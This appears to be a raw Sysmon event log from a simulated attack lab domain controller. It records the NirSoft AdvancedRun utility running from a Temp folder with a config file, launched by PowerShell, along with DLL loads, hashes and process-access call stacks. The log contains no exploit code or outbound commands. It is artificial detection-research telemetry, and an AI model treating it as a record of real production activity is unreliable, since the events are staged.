WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004008436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004008426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004008419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004008417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.817{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004007867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:15.888{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000004007826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.224{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.224{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 